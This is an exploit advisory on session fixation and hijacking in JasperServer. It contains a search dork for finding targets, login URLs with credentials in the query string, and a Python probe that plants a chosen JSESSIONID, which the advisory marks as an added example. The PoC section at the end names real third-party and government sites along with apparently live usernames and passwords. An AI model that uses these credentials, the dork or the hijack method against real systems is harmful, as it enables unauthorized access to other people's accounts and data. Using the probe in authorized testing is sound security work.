[+] Session Fixation / Hijacking on JasperServer

[+] Date: 09/05/2014

[+] Risk: High

[+] CWE number: CWE-384 

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.jaspersoft.com/

[+] Software Download : http://sourceforge.net/projects/jasperserver/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: intitle:JasperServer + inurl:j_password // use your brain ;)

[+] Exploit : 

        http://host/path/flow.html?_flowId=searchFlow&j_username=<username>&j_password=<password>

         or

        http://host/path/j_acegi_security_check?j_username=<username>&j_password=<password>

As part of the login process, the assigned session ID is revealed in a URL parameter, which allows an attacker to hijack another user's session. A session ID carried in the URL also ends up in browser history, proxy and web-server logs and in the Referer header sent to any third-party site, so anyone who sees the URL can replay the session.

Example:

    Vulnerable example: coopnet.leosoft.com.br

   GET /coopnet/j_acegi_security_check?j_username=teste&j_password=teste
   Host: coopnet.leosoft.com.br
   User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 
   With a request like that, the user's session ID is revealed in a URL parameter:

       "JSESSIONID=4635974EAA38774EF00FB270933D3C7D"


    The application authenticates users with a direct POST to j_acegi_security_check, which does not invalidate the existing session before processing the login request:

                  <form method="POST" action="j_acegi_security_check">
                  <input type="text" name="j_username">
                  <input type="text" name="j_password">
                  </form>
 
   Because of that, it is possible to authenticate a user, or otherwise establish a new user session, without invalidating any existing session. An attacker who plants a JSESSIONID of their choosing in the victim's browser before the victim logs in keeps that same ID after the login completes and can use it to act as the victim (CWE-384, session fixation).
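The check a tester would run against a j_acegi_security_check endpoint, as an added example that is not part of the original advisory: present an attacker-chosen JSESSIONID while logging in, then inspect the Set-Cookie header (or a ;jsessionid= rewritten into the redirect target) to see whether the server issued a fresh ID. The live_fetch helper talks to a real host and is not exercised offline; the vulnerable_fetch, url_rewrite_fetch and hardened_fetch stubs are constructed responses standing in for a server that keeps the supplied ID, one that echoes it back in the URL, and one that rotates it. The base URL and credentials passed to probe() are placeholders, and the fixed ID reuses the sample value from the advisory.

```python
"""Session-fixation probe for a Spring Security / Acegi style j_acegi_security_check login."""
import re
import urllib.error
import urllib.request
from http.cookies import SimpleCookie
from urllib.parse import urlencode

SESSION_COOKIE = "JSESSIONID"
# Attacker-chosen session id (constructed; same format as the advisory's sample value).
FIXED_ID = "4635974EAA38774EF00FB270933D3C7D"


def cookie_value(set_cookie_headers, name=SESSION_COOKIE):
    """Return the value of cookie `name` from a list of raw Set-Cookie header values, or None."""
    for raw in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(raw)
        if name in jar:
            return jar[name].value
    return None


def jsessionid_in_url(url):
    """Return a session id rewritten into the URL (';jsessionid=...' or a query parameter), or None."""
    match = re.search(r"(?i)jsessionid=([0-9A-Za-z]+)", url or "")
    return match.group(1) if match else None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following the post-login 302 so we see the login response's own headers."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_fetch(url, headers=None, data=None):
    """Real HTTP exchange (not used by the offline demo). Returns (status, Set-Cookie list, Location-or-url)."""
    req = urllib.request.Request(url, data=data, headers=headers or {})
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(req)
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx responses still carry the headers we need
        resp = err
    return resp.code, resp.headers.get_all("Set-Cookie") or [], resp.headers.get("Location", url)


def probe(base_url, username, password, fetch=live_fetch):
    """Log in while presenting FIXED_ID as our session and report 'fixated' or 'rotated'.

    'fixated': the server kept the id we supplied (no new JSESSIONID issued, or the same id
    echoed back in a cookie or URL), which is the CWE-384 condition the advisory describes.
    'rotated': the login response assigned a different session id.
    """
    login_url = base_url.rstrip("/") + "/j_acegi_security_check"
    body = urlencode({"j_username": username, "j_password": password}).encode()
    headers = {
        "Cookie": f"{SESSION_COOKIE}={FIXED_ID}",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    _status, set_cookies, next_url = fetch(login_url, headers, body)
    new_id = cookie_value(set_cookies) or jsessionid_in_url(next_url)
    if new_id is None or new_id == FIXED_ID:
        return "fixated"
    return "rotated"


# --- constructed stand-ins for server behaviour, so the probe runs offline ---

def vulnerable_fetch(url, headers, data):
    """Server authenticates the existing session and issues no new cookie."""
    return 302, [], "/jasperserver/flow.html?_flowId=searchFlow"


def url_rewrite_fetch(url, headers, data):
    """Server keeps the session and rewrites its id into the redirect target."""
    return 302, [], f"/jasperserver/flow.html;jsessionid={FIXED_ID}?_flowId=searchFlow"


def hardened_fetch(url, headers, data):
    """Server migrates to a fresh session id on successful login."""
    fresh = "0A1B2C3D4E5F60718293A4B5C6D7E8F9"  # constructed
    return 302, [f"{SESSION_COOKIE}={fresh}; Path=/jasperserver; HttpOnly"], "/jasperserver/flow.html?_flowId=searchFlow"


if __name__ == "__main__":
    for name, stub in (("vulnerable", vulnerable_fetch), ("url-rewrite", url_rewrite_fetch), ("hardened", hardened_fetch)):
        print(f"{name:12s} -> {probe('http://host/jasperserver', 'user', 'pass', fetch=stub)}")
```

Against a live target, call probe() with the default fetch and real credentials for a low-privilege test account; a "fixated" verdict means the ID an attacker plants before login is the ID the victim ends up authenticated under.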

[+] PoC : http://www2.emater.mg.gov.br/jasperserver/flow.html?_flowId=searchFlow&j_username=esloc&j_password=esloc
  
           j_username=esloc & j_password=esloc

          http://jrs.logifleet.com/jrs471/flow.html?_flowId=homeFlow&j_username=Scheuchzer%7CScheuchzer&j_password=Scheuchzer

           j_username=Scheuchzer%7CScheuchzer & j_password=Scheuchzer

          http://jasper.ffex.net:8080/jasperserver/flow.html?_flowId=searchFlow&&j_username=ratequote&j_password=rateme9

           j_username=ratequote & j_password=rateme9


More about the session fixation technique at: http://cwe.mitre.org/data/definitions/384.html